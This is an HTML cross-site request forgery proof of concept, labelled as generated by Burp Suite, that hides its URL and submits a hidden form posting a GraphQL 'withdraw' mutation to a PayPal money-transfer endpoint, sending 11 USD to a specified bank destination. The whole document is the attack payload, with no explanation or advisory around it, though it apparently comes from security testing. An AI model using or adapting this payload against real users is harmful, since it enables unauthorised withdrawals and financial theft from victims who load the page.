<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body>

1. <html>
2. <!-- CSRF PoC - generated by Burp Suite Professional -->
3. <body>
4. <script>history.pushState('', '', '/')</script>
5. <form action="https://www.paypal.com/moneytransfer/graphql" method="POST">
6. <input type="hidden" name="query" value="mutation&#123;&#32;withdraw&#40;input&#58;&#32;&#123;method&#58;ORIGINAL&#95;CREDIT&#44;amount&#58;&quot;11&quot;&#44;currency&#58;&quot;USD&quot;&#44;destinationId&#58;&quot;BA&#45;Z9XZNTVAQQMAE&quot;&#125;&#41;&#123;&#32;transactionId&#32;amount&#32;&#123;&#32;currency&#32;currencySymbol&#32;amount&#32;value&#32;raw&#32;formattedAmount&#32;formattedSymbolicISOCurrency&#32;formattedISOCurrency&#32;formattedCurrency&#32;&#125;&#32;netAmount&#32;&#123;&#32;currency&#32;currencySymbol&#32;amount&#32;value&#32;raw&#32;formattedAmount&#32;formattedSymbolicISOCurrency&#32;formattedISOCurrency&#32;formattedCurrency&#32;&#125;&#32;fees&#32;&#123;&#32;currency&#32;currencySymbol&#32;amount&#32;value&#32;raw&#32;formattedAmount&#32;formattedSymbolicISOCurrency&#32;formattedISOCurrency&#32;formattedCurrency&#32;&#125;&#32;currencyConversion&#32;&#123;&#32;amountFrom&#32;&#123;&#32;currency&#32;currencySymbol&#32;amount&#32;value&#32;raw&#32;formattedAmount&#32;formattedSymbolicISOCurrency&#32;formattedISOCurrency&#32;formattedCurrency&#32;&#125;&#32;amountTo&#32;&#123;&#32;currency&#32;currencySymbol&#32;amount&#32;value&#32;raw&#32;formattedAmount&#32;formattedSymbolicISOCurrency&#32;formattedISOCurrency&#32;formattedCurrency&#32;&#125;&#32;exchangeRate&#32;&#125;&#32;status&#32;holdReason&#32;holdPeriod&#32;purposeCode&#32;error&#32;&#123;&#32;source&#32;name&#32;issue&#32;message&#32;details&#32;&#123;&#32;field&#32;value&#32;issue&#32;description&#32;location&#32;&#125;&#32;debugId&#32;links&#32;&#123;&#32;href&#32;&#125;&#32;informationLink&#32;&#125;&#32;&#125;&#32;&#125;" />
7. <input type="submit" value="Submit request" />
8. </form>
9. </body>
10. </html>